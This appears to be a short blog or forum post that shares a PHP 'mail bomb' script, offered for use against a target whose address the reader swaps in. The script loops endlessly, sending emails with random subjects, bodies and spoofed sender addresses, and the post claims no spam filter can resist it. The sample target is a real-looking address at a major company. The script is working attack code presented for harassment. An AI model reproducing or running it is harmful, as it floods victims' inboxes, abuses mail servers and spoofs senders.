May 18
Hi all,
below, a file that can be used to send a mail bomb ![]()
You only need to change target@target.com, for the target.
He will get hundreds/thousends of email with random title/sender/content ![]()
Result => no spam filter can resist ![]()
<?php
# [BOM.PHP]
# © Jan Marques, 2007
#
/* Edit reciepent */
$target = “bill@microsoft.com”;
/* The script */
set_time_limit(1);
while(true)
{
mail($target, md5(rand()), md5(rand()), “From: ” . md5(rand()) . “@” . md5(rand()) . “.” . md5(rand()));
}
?>
Recent Comments